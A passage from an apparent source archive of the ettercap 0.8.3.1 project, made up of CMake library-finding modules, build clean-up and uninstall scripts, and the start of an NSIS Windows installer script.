_gtk3_find_library(GTK3_GDK_PIXBUF_LIBRARY gdk_pixbuf false true) _gtk3_find_include_dir(GTK3_GDK_INCLUDE_DIR gdk/gdk.h) _gtk3_find_include_dir(GTK3_GDKCONFIG_INCLUDE_DIR gdk/gdkconfig.h) _gtk3_find_include_dir(GTK3_GTK_INCLUDE_DIR gtk/gtk.h) # ********* At least on Debian the gdk & gtk libraries # ********* don't have the -x11 suffix. if(UNIX) _gtk3_find_library(GTK3_GDK_LIBRARY gdk false true) _gtk3_find_library(GTK3_GTK_LIBRARY gtk false true) else() # ********* There are various gtk3 builds/packages/bundles # ********* available on Windows. Some of them follow the # ********* classic naming scheme (libs with -win32 suffix) # ********* and others prefer the original names. # ********* Because we want to support as many packages # ********* as possible, we search for both naming styles. # ********* Starting with the original names. # ********* # ********* Tested with both vcpkg (gtk+-3.22.19) # ********* and Msys2 (gtk+-3.22.28) _gtk3_find_library(GTK3_GDK_LIBRARY gdk false true) _gtk3_find_library(GTK3_GTK_LIBRARY gtk false true) _gtk3_find_library(GTK3_GDK_LIBRARY gdk-win32 false true) _gtk3_find_library(GTK3_GTK_LIBRARY gtk-win32 false true) endif() _gtk3_find_include_dir(GTK3_CAIRO_INCLUDE_DIR cairo.h) _gtk3_find_library(GTK3_CAIRO_LIBRARY cairo false false) _gtk3_find_include_dir(GTK3_FONTCONFIG_INCLUDE_DIR fontconfig/fontconfig.h) _gtk3_find_include_dir(GTK3_PANGO_INCLUDE_DIR pango/pango.h) _gtk3_find_library(GTK3_PANGO_LIBRARY pango false true) _gtk3_find_include_dir(GTK3_HARFBUZZ_INCLUDE_DIR hb.h) _gtk3_find_include_dir(GTK3_ATK_INCLUDE_DIR atk/atk.h) _gtk3_find_library(GTK3_ATK_LIBRARY atk false true) elseif(_GTK3_component STREQUAL "gtkmm") _gtk3_find_include_dir(GTK3_GLIBMM_INCLUDE_DIR glibmm.h) _gtk3_find_include_dir(GTK3_GLIBMMCONFIG_INCLUDE_DIR glibmmconfig.h) _gtk3_find_library(GTK3_GLIBMM_LIBRARY glibmm true true) _gtk3_find_include_dir(GTK3_GDKMM_INCLUDE_DIR gdkmm.h) _gtk3_find_include_dir(GTK3_GDKMMCONFIG_INCLUDE_DIR gdkmmconfig.h) _gtk3_find_library(GTK3_GDKMM_LIBRARY gdkmm true true) _gtk3_find_include_dir(GTK3_GTKMM_INCLUDE_DIR gtkmm.h) _gtk3_find_include_dir(GTK3_GTKMMCONFIG_INCLUDE_DIR gtkmmconfig.h) _gtk3_find_library(GTK3_GTKMM_LIBRARY gtkmm true true) _gtk3_find_include_dir(GTK3_CAIROMM_INCLUDE_DIR cairomm/cairomm.h) _gtk3_find_library(GTK3_CAIROMM_LIBRARY cairomm true true) _gtk3_find_include_dir(GTK3_PANGOMM_INCLUDE_DIR pangomm.h) _gtk3_find_include_dir(GTK3_PANGOMMCONFIG_INCLUDE_DIR pangommconfig.h) _gtk3_find_library(GTK3_PANGOMM_LIBRARY pangomm true true) _gtk3_find_include_dir(GTK3_SIGC++_INCLUDE_DIR sigc++/sigc++.h) _gtk3_find_include_dir(GTK3_SIGC++CONFIG_INCLUDE_DIR sigc++config.h) _gtk3_find_library(GTK3_SIGC++_LIBRARY sigc true true) _gtk3_find_include_dir(GTK3_GIOMM_INCLUDE_DIR giomm.h) _gtk3_find_include_dir(GTK3_GIOMMCONFIG_INCLUDE_DIR giommconfig.h) _gtk3_find_library(GTK3_GIOMM_LIBRARY giomm true true) _gtk3_find_include_dir(GTK3_ATKMM_INCLUDE_DIR atkmm.h) _gtk3_find_library(GTK3_ATKMM_LIBRARY atkmm true true) elseif(_GTK3_component STREQUAL "glade") _gtk3_find_include_dir(GTK3_GLADE_INCLUDE_DIR glade/glade.h) _gtk3_find_library(GTK3_GLADE_LIBRARY glade false true) elseif(_GTK3_component STREQUAL "glademm") _gtk3_find_include_dir(GTK3_GLADEMM_INCLUDE_DIR libglademm.h) _gtk3_find_include_dir(GTK3_GLADEMMCONFIG_INCLUDE_DIR libglademmconfig.h) _gtk3_find_library(GTK3_GLADEMM_LIBRARY glademm true true) else() message(FATAL_ERROR "Unknown GTK3 component ${_component}") endif() endforeach() # # Solve for the GTK3 version if we haven't already # if(NOT GTK3_FIND_VERSION AND GTK3_GTK_INCLUDE_DIR) _gtk3_get_version(GTK3_MAJOR_VERSION GTK3_MINOR_VERSION GTK3_PATCH_VERSION ${GTK3_GTK_INCLUDE_DIR}/gtk/gtkversion.h) set(GTK3_VERSION ${GTK3_MAJOR_VERSION}.${GTK3_MINOR_VERSION}.${GTK3_PATCH_VERSION} ) endif() # # Try to enforce components # set(_GTK3_did_we_find_everything true) # This gets set to GTK3_FOUND include(FindPackageHandleStandardArgs) #include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake) foreach(_GTK3_component ${GTK3_FIND_COMPONENTS}) string(TOUPPER ${_GTK3_component} _COMPONENT_UPPER) if(_GTK3_component STREQUAL "gtk") find_package_handle_standard_args(GTK3_${_COMPONENT_UPPER} "Some or all of the gtk libraries were not found." GTK3_GTK_LIBRARY GTK3_GTK_INCLUDE_DIR GTK3_GLIB_INCLUDE_DIR GTK3_GLIBCONFIG_INCLUDE_DIR GTK3_GLIB_LIBRARY GTK3_GTHREAD_LIBRARY GTK3_GDK_INCLUDE_DIR GTK3_GDKCONFIG_INCLUDE_DIR GTK3_GDK_LIBRARY ) elseif(_GTK3_component STREQUAL "gtkmm") find_package_handle_standard_args(GTK3_${_COMPONENT_UPPER} "Some or all of the gtkmm libraries were not found." GTK3_GTKMM_LIBRARY GTK3_GTKMM_INCLUDE_DIR GTK3_GTKMMCONFIG_INCLUDE_DIR GTK3_GLIBMM_INCLUDE_DIR GTK3_GLIBMMCONFIG_INCLUDE_DIR GTK3_GLIBMM_LIBRARY GTK3_GDKMM_INCLUDE_DIR GTK3_GDKMMCONFIG_INCLUDE_DIR GTK3_GDKMM_LIBRARY ) elseif(_GTK3_component STREQUAL "glade") find_package_handle_standard_args(GTK3_${_COMPONENT_UPPER} "The glade library was not found." GTK3_GLADE_LIBRARY GTK3_GLADE_INCLUDE_DIR ) elseif(_GTK3_component STREQUAL "glademm") find_package_handle_standard_args(GTK3_${_COMPONENT_UPPER} "The glademm library was not found." GTK3_GLADEMM_LIBRARY GTK3_GLADEMM_INCLUDE_DIR GTK3_GLADEMMCONFIG_INCLUDE_DIR ) endif() if(NOT GTK3_${_COMPONENT_UPPER}_FOUND) set(_GTK3_did_we_find_everything false) endif() endforeach() if(_GTK3_did_we_find_everything AND NOT GTK3_VERSION_CHECK_FAILED) set(GTK3_FOUND true) else() # Unset our variables. set(GTK3_FOUND false) set(GTK3_VERSION) set(GTK3_VERSION_MAJOR) set(GTK3_VERSION_MINOR) set(GTK3_VERSION_PATCH) set(GTK3_INCLUDE_DIRS) set(GTK3_LIBRARIES) endif() if(GTK3_INCLUDE_DIRS) list(REMOVE_DUPLICATES GTK3_INCLUDE_DIRS) endif() ettercap-0.8.3.1/cmake/Modules/FindLIBCHECK.cmake000664 000000 000000 00000003367 13711276346 021132 0ustar00rootroot000000 000000 # - Try to find LibCheck # Once done this will define # LIBCHECK_FOUND - System has LibCheck # LIBCHECK_INCLUDE_DIRS - The LibCheck include directories # LIBCHECK_LIBRARIES - The libraries needed to use LibCheck # LIBCHECK_DEFINITIONS - Compiler switches required for using LibCheck find_package(PkgConfig) include(FindPkgConfig) pkg_check_modules(PC_LIBCHECK libcheck) if(PC_LIBCHECK_FOUND) set(LIBCHECK_FOUND TRUE) set(LIBCHECK_LDFLAGS ${PC_LIBCHECK_LDFLGAS}) set(LIBCHECK_LIBRARIES ${PC_LIBCHECK_LIBRARIES}) set(LIBCHECK_INCLUDE_DIRS ${PC_LIBCHECK_INCLUDE_DIR}) else() pkg_check_modules(PC_CHECK check) if(PC_CHECK_FOUND) set(LIBCHECK_FOUND TRUE) set(LIBCHECK_LDFLAGS ${PC_CHECK_LDFLGAS}) set(LIBCHECK_LIBRARIES ${PC_CHECK_LIBRARIES}) set(LIBCHECK_INCLUDE_DIRS ${PC_CHECK_INCLUDE_DIR}) else() set(LIBCHECK_DEFINITIONS ${PC_LIBCHECK_CFLAGS_OTHER}) find_path(LIBCHECK_INCLUDE_DIR check.h HINTS ${PC_LIBCHECK_INCLUDEDIR} ${PC_LIBCHECK_INCLUDE_DIRS}) find_library(LIBCHECK_LIBRARY NAMES check libcheck HINTS ${PC_LIBCHECK_LIBDIR} ${PC_LIBCHECK_LIBRARY_DIRS}) if(LIBCHECK_LIBRARY_FOUND) set(LIBCHECK_FOUND TRUE) set(LIBCHECK_LIBRARIES ${LIBCHECK_LIBRARY}) else() include(FindPackageHandleStandardArgs) # handle the QUIETLY and REQUIRED arguments and set LIBCHECK_FOUND to TRUE # if all listed variables are TRUE find_package_handle_standard_args(LIBCHECK DEFAULT_MSG LIBCHECK_LIBRARY LIBCHECK_INCLUDE_DIR) if(LIBCHECK_FOUND) set(LIBCHECK_LIBRARIES ${LIBCHECK_LIBRARY}) set(LIBCHECK_INCLUDE_DIRS ${LIBCHECK_INCLUDE_DIR}) endif() endif() endif() endif() mark_as_advanced(LIBCHECK_INCLUDE_DIR LIBCHECK_LIBRARY) ettercap-0.8.3.1/cmake/Modules/FindLIBIDN.cmake000664 000000 000000 00000001754 13711276346 020725 0ustar00rootroot000000 000000 # - Try to find LIBIDN # Find LIBIDN headers, libraries and the answer to all questions. # # LIBIDN_FOUND True if libidn got found # LIBIDN_INCLUDE_DIR Location of libidn headers # LIBIDN_LIBRARIES List of libaries to use libidn # # Copyright (c) 2009 Nigmatullin Ruslan # # Redistribution and use is allowed according to the terms of the New # BSD license. # For details see the accompanying COPYING-CMAKE-SCRIPTS file. # if(WIN32) find_path(LIBIDN_INCLUDE_DIR stringprep.h $ENV{INCLUDE}) find_library(LIBIDN_LIBRARIES libidn $ENV{LIB}) else() find_path(LIBIDN_INCLUDE_DIR stringprep.h) find_library(LIBIDN_LIBRARIES idn) endif() include(FindPackageHandleStandardArgs) find_package_handle_standard_args(LIBIDN DEFAULT_MSG LIBIDN_LIBRARIES LIBIDN_INCLUDE_DIR) if(LIBIDN_FOUND) set(LIBIDN_LIBRARY ${LIBIDN_LIBRARIES}) set(LIBIDN_INCLUDE_DIRS ${LIBIDN_INCLUDE_DIR}) endif() mark_as_advanced(LIBIDN_LIBRARIES LIBIDN_INCLUDE_DIRS) ettercap-0.8.3.1/cmake/Modules/FindLIBNET.cmake000664 000000 000000 00000007410 13711276346 020734 0ustar00rootroot000000 000000 # Copyright 2013 Ettercap Development Team. # # Distributed under GPL license. # # Look for the header file find_path(LIBNET_INCLUDE_DIR NAMES libnet.h PATH_SUFFIXES libnet11) mark_as_advanced(LIBNET_INCLUDE_DIR) #Look for the library find_library(LIBNET_LIBRARY NAMES net libnet PATH_SUFFIXES libnet11) mark_as_advanced(LIBNET_LIBRARY) # Make sure we've got an include dir. if(NOT LIBNET_INCLUDE_DIR) if(LIBNET_FIND_REQUIRED AND NOT LIBNET_FIND_QUIETLY) message(FATAL_ERROR "Could not find LIBNET include directory.") endif() return() endif() if(NOT LIBNET_LIBRARY) if(LIBNET_FIND_REQUIRED AND NOT LIBNET_FIND_QUIETLY) message(FATAL_ERROR "Could not find LIBNET library.") endif() return() endif() #============================================================= # _LIBNET_GET_VERSION # Internal function to parse the version number in libnet.h # _OUT_version = The full version number # _OUT_version_major = The major version number only # _OUT_version_minor = The minor version number only # _libnet_hdr = Header file to parse #============================================================= function(_LIBNET_GET_VERSION _OUT_version _OUT_version_major _OUT_version_minor _libnet_hdr) file(READ ${_libnet_hdr} _contents) if(_contents) string(REGEX REPLACE ".*#define LIBNET_VERSION[ \t]+\"([0-9.rc-]+)\".*" "\\1" ${_OUT_version} "${_contents}") if(NOT ${_OUT_version} MATCHES "[0-9.rc-]+") message(FATAL_ERROR "Version parsing failed for LIBNET_VERSION!") endif() set(${_OUT_version} ${${_OUT_version}} PARENT_SCOPE) string(REGEX REPLACE "^([0-9]+)\\.[0-9]+.*" "\\1" ${_OUT_version_major} "${${_OUT_version}}") string(REGEX REPLACE "^[0-9]+\\.([0-9]+).*" "\\1" ${_OUT_version_minor} "${${_OUT_version}}") if(NOT ${_OUT_version_major} MATCHES "[0-9]+" OR NOT ${_OUT_version_minor} MATCHES "[0-9]+") message(FATAL_ERROR "Version parsing failed for detailed LIBNET_VERSION!: '${_OUT_version}' '${_OUT_version_major}' '${_OUT_version_minor}'") endif() set(${_OUT_version_major} ${${_OUT_version_major}} PARENT_SCOPE) set(${_OUT_version_minor} ${${_OUT_version_minor}} PARENT_SCOPE) else() message(FATAL_ERROR "Include file ${_libnet_hdr} does not exist") endif() endfunction() if(LIBNET_FIND_VERSION) set(LIBNET_FAILED_VERSION_CHECK true) _libnet_get_version(LIBNET_VERSION LIBNET_VERSION_MAJOR LIBNET_VERSION_MINOR ${LIBNET_INCLUDE_DIR}/libnet.h) if(LIBNET_FIND_VERSION_EXACT) if(LIBNET_VERSION VERSION_EQUAL LIBNET_FIND_VERSION) set(LIBNET_FAILED_VERSION_CHECK false) endif() else() if(LIBNET_VERSION VERSION_EQUAL LIBNET_FIND_VERSION OR LIBNET_VERSION VERSION_GREATER LIBNET_FIND_VERSION) set(LIBNET_FAILED_VERSION_CHECK false) endif() endif() if(LIBNET_FAILED_VERSION_CHECK) if(LIBNET_FIND_REQUIRED AND NOT LIBNET_FIND_QUIETLY) if(LIBNET_FIND_VERSION_EXACT) message(FATAL_ERROR "LIBNET version check failed. Version ${LIBNET_VERSION} was found, version ${LIBNET_FIND_VERSION} is needed exactly.") else() message(FATAL_ERROR "LIBNET version check failed. Version ${LIBNET_VERSION} was found, at least version ${LIBNET_FIND_VERSION} is required") endif() endif() # If the version check fails, exit out of the module here return() endif() endif() #handle the QUIETLY and REQUIRED arguments and set LIBNET_FOUND to TRUE if # all listed variables are TRUE include(FindPackageHandleStandardArgs) find_package_handle_standard_args(LIBNET DEFAULT_MSG LIBNET_LIBRARY LIBNET_INCLUDE_DIR) if(LIBNET_FOUND) set(LIBNET_LIBRARY ${LIBNET_LIBRARY}) set(LIBNET_INCLUDE_DIR ${LIBNET_INCLUDE_DIR}) set(LIBNET_VERSION ${LIBNET_VERSION}) set(LIBNET_VERSION_MAJOR ${LIBNET_VERSION_MAJOR}) set(LIBNET_VERSION_MINOR ${LIBNET_VERSION_MINOR}) endif() ettercap-0.8.3.1/cmake/Modules/FindLIBRTMP.cmake000664 000000 000000 00000000314 13711276346 021064 0ustar00rootroot000000 000000 find_path(RTMP_INCLUDE_DIR librtmp/rtmp.h) find_library(RTMP_LIBRARIES rtmp) include(FindPackageHandleStandardArgs) find_package_handle_standard_args(LIBRTMP DEFAULT_MSG RTMP_LIBRARIES RTMP_INCLUDE_DIR) ettercap-0.8.3.1/cmake/Modules/FindLUAJIT.cmake000664 000000 000000 00000005757 13711276346 020763 0ustar00rootroot000000 000000 # Copyright 2013 Ettercap Development Team. # # Distributed under GPL licnse. # # Look for the header file find_path(LUAJIT_INCLUDE_DIR NAMES luajit.h PATH_SUFFIXES luajit-2.1 luajit-2.0 luajit) mark_as_advanced(LUAJIT_INCLUDE_DIR) #Look for the library find_library(LUAJIT_LIBRARY NAMES luajit-5.1) mark_as_advanced(LUAJIT_LIBRARY) # Make sure we've got an include dir. if(NOT LUAJIT_INCLUDE_DIR) if(LUAJIT_FIND_REQUIRED AND NOT LUAJIT_FIND_QUIETLY) message(FATAL_ERROR "Could not find LUAJIT include directory.") endif() return() endif() if(NOT LUAJIT_LIBRARY) if(LUAJIT_FIND_REQUIRED AND NOT LUAJIT_FIND_QUIETLY) message(FATAL_ERROR "Could not find LUAJIT library.") endif() return() endif() #============================================================= # _LUAJIT_GET_VERSION # Internal function to parse the version number in luajit.h # _OUT_version = The version number # _luajit_hdr = Header file to parse #============================================================= function(_LUAJIT_GET_VERSION _OUT_version _luajit_hdr) file(READ ${_luajit_hdr} _contents) if(_contents) # Example: #define LUAJIT_VERSION_NUM 20000 /* Version 2.0.0 = 02.00.00. */ string(REGEX REPLACE ".*#define LUAJIT_VERSION_NUM[ \t]+([0-9]+)([0-9][0-9])([0-9][0-9])[^0-9].*" "\\1.\\2.\\3" ${_OUT_version} "${_contents}") if(NOT ${_OUT_version} MATCHES "[0-9.]+") message(FATAL_ERROR "Version parsing failed for LUAJIT_VERSION!") endif() set(${_OUT_version} ${${_OUT_version}} PARENT_SCOPE) else() message(FATAL_ERROR "Include file ${_luajit_hdr} does not exist") endif() endfunction() if(LUAJIT_FIND_VERSION) set(LUAJIT_FAILED_VERSION_CHECK true) _luajit_get_version(LUAJIT_VERSION ${LUAJIT_INCLUDE_DIR}/luajit.h) if(LUAJIT_FIND_VERSION_EXACT) if(LUAJIT_VERSION VERSION_EQUAL LUAJIT_FIND_VERSION) set(LUAJIT_FAILED_VERSION_CHECK false) endif() else() if(LUAJIT_VERSION VERSION_EQUAL LUAJIT_FIND_VERSION OR LUAJIT_VERSION VERSION_GREATER LUAJIT_FIND_VERSION) set(LUAJIT_FAILED_VERSION_CHECK false) endif() endif() if(LUAJIT_FAILED_VERSION_CHECK) if(LUAJIT_FIND_REQUIRED AND NOT LUAJIT_FIND_QUIETLY) if(LUAJIT_FIND_VERSION_EXACT) message(FATAL_ERROR "LUAJIT version check failed. Version ${LUAJIT_VERSION} was found, version ${LUAJIT_FIND_VERSION} is needed exactly.") else() message(FATAL_ERROR "LUAJIT version check failed. Version ${LUAJIT_VERSION} was found, at least version ${LUAJIT_FIND_VERSION} is required") endif() endif() # If the version check fails, exit out of the module here return() endif() endif() #handle the QUIETLY and REQUIRED arguments and set LUAJIT_FOUND to TRUE if # all listed variables are TRUE include(FindPackageHandleStandardArgs) find_package_handle_standard_args(LUAJIT DEFAULT_MSG LUAJIT_LIBRARY LUAJIT_INCLUDE_DIR) if(LUAJIT_FOUND) set(LUAJIT_LIBRARY ${LUAJIT_LIBRARY}) set(LUAJIT_INCLUDE_DIR ${LUAJIT_INCLUDE_DIR}) set(LUAJIT_VERSION ${LUAJIT_VERSION}) endif() ettercap-0.8.3.1/cmake/Modules/FindPCRE.cmake000664 000000 000000 00000005124 13711276346 020510 0ustar00rootroot000000 000000 # Copyright 2013 Ettercap Development Team. # # Distributed under GPL licnse. # # Look for the header file find_path(PCRE_INCLUDE_DIR NAMES pcre.h) mark_as_advanced(PCRE_INCLUDE_DIR) # Look for the library. find_library(PCRE_LIBRARY NAMES pcre) mark_as_advanced(PCRE_LIBRARY) # Make sure we've got an include dir. if(NOT PCRE_INCLUDE_DIR) if(PCRE_FIND_REQUIRED AND NOT PCRE_FIND_QUIETLY) message(FATAL_ERROR "Could not find PCRE include directory.") endif() return() endif() if(NOT PCRE_LIBRARY) if(PCRE_FIND_REQUIRED AND NOT PCRE_FIND_QUIETLY) message(FATAL_ERROR "Could not find PCRE library.") endif() return() endif() function(extract_version FILENAME DEFNAME VARIABLE) file(STRINGS ${FILENAME} pcre_version_str REGEX "^#define[\t ]+${DEFNAME}[\t ]+.*") string(REGEX REPLACE "^#define[\t ]+${DEFNAME}[\t ]+([0-9]+).*" "\\1" temp_var "${pcre_version_str}") set(${VARIABLE} ${temp_var} PARENT_SCOPE) endfunction() if(PCRE_FIND_VERSION) # Try to find the version number. set(HEADER_FILE "${PCRE_INCLUDE_DIR}/pcre.h") if(EXISTS ${HEADER_FILE}) extract_version(${HEADER_FILE} PCRE_MAJOR PCRE_VERSION_STRING_MAJOR) extract_version(${HEADER_FILE} PCRE_MINOR PCRE_VERSION_STRING_MINOR) set(PCRE_VERSION_STRING "${PCRE_VERSION_STRING_MAJOR}.${PCRE_VERSION_STRING_MINOR}") endif() set(PCRE_FAILED_VERSION_CHECK true) if(PCRE_FIND_VERSION_EXACT) if(PCRE_VERSION_STRING VERSION_EQUAL PCRE_FIND_VERSION) set(PCRE_FAILED_VERSION_CHECK false) endif() else() if(PCRE_VERSION_STRING VERSION_EQUAL PCRE_FIND_VERSION OR PCRE_VERSION_STRING VERSION_GREATER PCRE_FIND_VERSION) set(PCRE_FAILED_VERSION_CHECK false) endif() endif() if(PCRE_FAILED_VERSION_CHECK) if(PCRE_FIND_REQUIRED AND NOT PCRE_FIND_QUIETLY) if(PCRE_FIND_VERSION_EXACT) message(FATAL_ERROR "PCRE version check failed. Version ${PCRE_VERSION_STRING} was found, version ${PCRE_FIND_VERSION} is needed exactly.") else() message(FATAL_ERROR "PCRE version check failed. Version ${PCRE_VERSION_STRING} was found, at least version ${PCRE_FIND_VERSION} is required") endif() endif() # If the version check fails, exit out of the module here return() endif() endif() #handle the QUIETLY and REQUIRED arguments and set PCRE_FOUND to TRUE if # all listed variables are TRUE include(FindPackageHandleStandardArgs) find_package_handle_standard_args(PCRE DEFAULT_MSG PCRE_LIBRARY PCRE_INCLUDE_DIR) if(PCRE_FOUND) set(PCRE_LIBRARY ${PCRE_LIBRARY}) set(PCRE_INCLUDE_DIR ${PCRE_INCLUDE_DIR}) set(PCRE_VERSION_STRING ${PCRE_VERSION_STRING}) endif() ettercap-0.8.3.1/cmake/Modules/MacroEnsureOutOfSourceBuild.cmake000664 000000 000000 00000001145 13711276346 024516 0ustar00rootroot000000 000000 # - MACRO_ENSURE_OUT_OF_SOURCE_BUILD() # MACRO_ENSURE_OUT_OF_SOURCE_BUILD() # Copyright (c) 2006, Alexander Neundorf, # # Redistribution and use is allowed according to the terms of the BSD license. # For details see the accompanying COPYING-CMAKE-SCRIPTS file. macro(MACRO_ENSURE_OUT_OF_SOURCE_BUILD _errorMessage) string(COMPARE EQUAL "${CMAKE_SOURCE_DIR}" "${CMAKE_BINARY_DIR}" _insource) if(_insource) message(SEND_ERROR "${_errorMessage}") message(FATAL_ERROR "Remove the file CMakeCache.txt in ${CMAKE_SOURCE_DIR} first.") endif() endmacro() ettercap-0.8.3.1/cmake/Modules/SelectLibraryConfigurations.cmake000664 000000 000000 00000006315 13711276346 024640 0ustar00rootroot000000 000000 # Distributed under the OSI-approved BSD 3-Clause License. See accompanying # file Copyright.txt or https://cmake.org/licensing for details. #[=======================================================================[.rst: SelectLibraryConfigurations --------------------------- .. code-block:: cmake select_library_configurations(basename) This macro takes a library base name as an argument, and will choose good values for the variables :: basename_LIBRARY basename_LIBRARIES basename_LIBRARY_DEBUG basename_LIBRARY_RELEASE depending on what has been found and set. If only ``basename_LIBRARY_RELEASE`` is defined, ``basename_LIBRARY`` will be set to the release value, and ``basename_LIBRARY_DEBUG`` will be set to ``basename_LIBRARY_DEBUG-NOTFOUND``. If only ``basename_LIBRARY_DEBUG`` is defined, then ``basename_LIBRARY`` will take the debug value, and ``basename_LIBRARY_RELEASE`` will be set to ``basename_LIBRARY_RELEASE-NOTFOUND``. If the generator supports configuration types, then ``basename_LIBRARY`` and ``basename_LIBRARIES`` will be set with debug and optimized flags specifying the library to be used for the given configuration. If no build type has been set or the generator in use does not support configuration types, then ``basename_LIBRARY`` and ``basename_LIBRARIES`` will take only the release value, or the debug value if the release one is not set. #]=======================================================================] # This macro was adapted from the FindQt4 CMake module and is maintained by Will # Dicharry . macro(select_library_configurations basename) if(NOT ${basename}_LIBRARY_RELEASE) set(${basename}_LIBRARY_RELEASE "${basename}_LIBRARY_RELEASE-NOTFOUND" CACHE FILEPATH "Path to a library.") endif() if(NOT ${basename}_LIBRARY_DEBUG) set(${basename}_LIBRARY_DEBUG "${basename}_LIBRARY_DEBUG-NOTFOUND" CACHE FILEPATH "Path to a library.") endif() get_property(_isMultiConfig GLOBAL PROPERTY GENERATOR_IS_MULTI_CONFIG) if( ${basename}_LIBRARY_DEBUG AND ${basename}_LIBRARY_RELEASE AND NOT ${basename}_LIBRARY_DEBUG STREQUAL ${basename}_LIBRARY_RELEASE AND ( _isMultiConfig OR CMAKE_BUILD_TYPE ) ) # if the generator is multi-config or if CMAKE_BUILD_TYPE is set for # single-config generators, set optimized and debug libraries set( ${basename}_LIBRARY "" ) foreach( _libname IN LISTS ${basename}_LIBRARY_RELEASE ) list( APPEND ${basename}_LIBRARY optimized "${_libname}" ) endforeach() foreach( _libname IN LISTS ${basename}_LIBRARY_DEBUG ) list( APPEND ${basename}_LIBRARY debug "${_libname}" ) endforeach() elseif( ${basename}_LIBRARY_RELEASE ) set( ${basename}_LIBRARY ${${basename}_LIBRARY_RELEASE} ) elseif( ${basename}_LIBRARY_DEBUG ) set( ${basename}_LIBRARY ${${basename}_LIBRARY_DEBUG} ) else() set( ${basename}_LIBRARY "${basename}_LIBRARY-NOTFOUND" ) endif() set( ${basename}_LIBRARIES "${${basename}_LIBRARY}" ) if( ${basename}_LIBRARY ) set( ${basename}_FOUND TRUE ) endif() mark_as_advanced( ${basename}_LIBRARY_RELEASE ${basename}_LIBRARY_DEBUG ) endmacro() ettercap-0.8.3.1/cmake/Scripts/000775 000000 000000 00000000000 13711276346 016171 5ustar00rootroot000000 000000 ettercap-0.8.3.1/cmake/Scripts/clean-all.cmake000664 000000 000000 00000002124 13711276346 021022 0ustar00rootroot000000 000000 # The helps us make sure that the build directory is *really* clean. set(cmake_generated ${CMAKE_BINARY_DIR}/CMakeCache.txt ${CMAKE_BINARY_DIR}/cmake_install.cmake ${CMAKE_BINARY_DIR}/Makefile ${CMAKE_BINARY_DIR}/CMakeFiles ${CMAKE_BINARY_DIR}/cmake_uninstall.cmake ${CMAKE_BINARY_DIR}/CTestTestfile.cmake ${CMAKE_BINARY_DIR}/install_manifest.txt ${CMAKE_BINARY_DIR}/desktop/ ${CMAKE_BINARY_DIR}/include/ ${CMAKE_BINARY_DIR}/man/ ${CMAKE_BINARY_DIR}/plug-ins/ ${CMAKE_BINARY_DIR}/share/ ${CMAKE_BINARY_DIR}/src/ ${CMAKE_BINARY_DIR}/tests/ ${CMAKE_BINARY_DIR}/utils/ ${CMAKE_BINARY_DIR}/Testing/ ${CMAKE_BINARY_DIR}/AUTHORS ${CMAKE_BINARY_DIR}/LICENSE ) foreach(file ${cmake_generated}) if(EXISTS ${file}) file(REMOVE_RECURSE ${file}) endif() endforeach() ettercap-0.8.3.1/cmake/Scripts/cmake_uninstall.cmake.in000664 000000 000000 00000002013 13711276346 022745 0ustar00rootroot000000 000000 if(NOT EXISTS "@CMAKE_CURRENT_BINARY_DIR@/install_manifest.txt") message(FATAL_ERROR "Cannot find install manifest: @CMAKE_CURRENT_BINARY_DIR@/install_manifest.txt") endif(NOT EXISTS "@CMAKE_CURRENT_BINARY_DIR@/install_manifest.txt") file(READ "@CMAKE_CURRENT_BINARY_DIR@/install_manifest.txt" files) string(REGEX REPLACE "\n" ";" files "${files}") foreach(file ${files}) message(STATUS "Uninstalling $ENV{DESTDIR}${file}") if(IS_SYMLINK "$ENV{DESTDIR}${file}" OR EXISTS "$ENV{DESTDIR}${file}") exec_program( "@CMAKE_COMMAND@" ARGS "-E remove \"$ENV{DESTDIR}${file}\"" OUTPUT_VARIABLE rm_out RETURN_VALUE rm_retval ) if(NOT "${rm_retval}" STREQUAL 0) message(FATAL_ERROR "Problem when removing $ENV{DESTDIR}${file}") endif(NOT "${rm_retval}" STREQUAL 0) else(IS_SYMLINK "$ENV{DESTDIR}${file}" OR EXISTS "$ENV{DESTDIR}${file}") message(STATUS "File $ENV{DESTDIR}${file} does not exist.") endif(IS_SYMLINK "$ENV{DESTDIR}${file}" OR EXISTS "$ENV{DESTDIR}${file}") endforeach(file) ettercap-0.8.3.1/contrib/000775 000000 000000 00000000000 13711276346 015122 5ustar00rootroot000000 000000 ettercap-0.8.3.1/contrib/nsis/000775 000000 000000 00000000000 13711276346 016076 5ustar00rootroot000000 000000 ettercap-0.8.3.1/contrib/nsis/EttercapNG.nsi000664 000000 000000 00000040356 13711276346 020615 0ustar00rootroot000000 000000 ; ; ettercap -- NSIS script for the windows installer ; ; Copyright (C) ALoR ; ; This program is free software; you can redistribute it and/or modify ; it under the terms of the GNU General Public License as published by ; the Free Software Foundation; either version 2 of the License, or ; (at your option) any later version. ; ; This program is distributed in the hope that it will be useful, ; but WITHOUT ANY WARRANTY; without even the implied warranty of ; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ; GNU General Public License for more details. ; ; You should have received a copy of the GNU General Public License ; along with this program; if not, write to the Free Software ; Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. ; ; ; NOTE: this .NSI script is designed for NSIS v2.0+ ;-------------------------------- ;Version Information !define VER_MAJOR 0 !define VER_MINOR 7 !define VER_REVISION 3 !define VER_DISPLAY "0.7.3" ;-------------------------------- ;Include Modern UI !include "MUI.nsh" ;-------------------------------- ;General ;Name and file Name "Ettercap NG" Caption "Ettercap ${VER_DISPLAY} Setup" OutFile "ettercap-NG-${VER_DISPLAY}-win32.exe" ;Default installation folder InstallDir "$PROGRAMFILES\EttercapNG" ;Get installation folder from registry if available InstallDirRegKey HKCU "Software\ettercap_ng" "" ;-------------------------------- ;Compiler settings SetCompressor lzma SetDatablockOptimize on CRCCheck on ShowInstDetails show ; (can be show to have them shown, or nevershow to disable) ShowUnInstDetails show ; (can be show to have them shown, or nevershow to disable) SetDateSave on ; (can be on to have files restored to their orginal date) ;-------------------------------- ;Variables Var MUI_TEMP Var STARTMENU_FOLDER Var CHECKFAILED Var DOCUMENTATION ; window handlers Var NEXTBUTTON Var BACKBUTTON Var CANCELBUTTON ;-------------------------------- ;Interface Configuration !define MUI_ICON "eNG.ico" !define MUI_HEADERIMAGE !define MUI_HEADERIMAGE_BITMAP "${NSISDIR}\Contrib\Graphics\Header\win.bmp" !define MUI_CUSTOMFUNCTION_ABORT UserAbort !define MUI_ABORTWARNING_TEXT "Do you want to exit the Ettercap NG setup ?" !define MUI_COMPONENTSPAGE_SMALLDESC 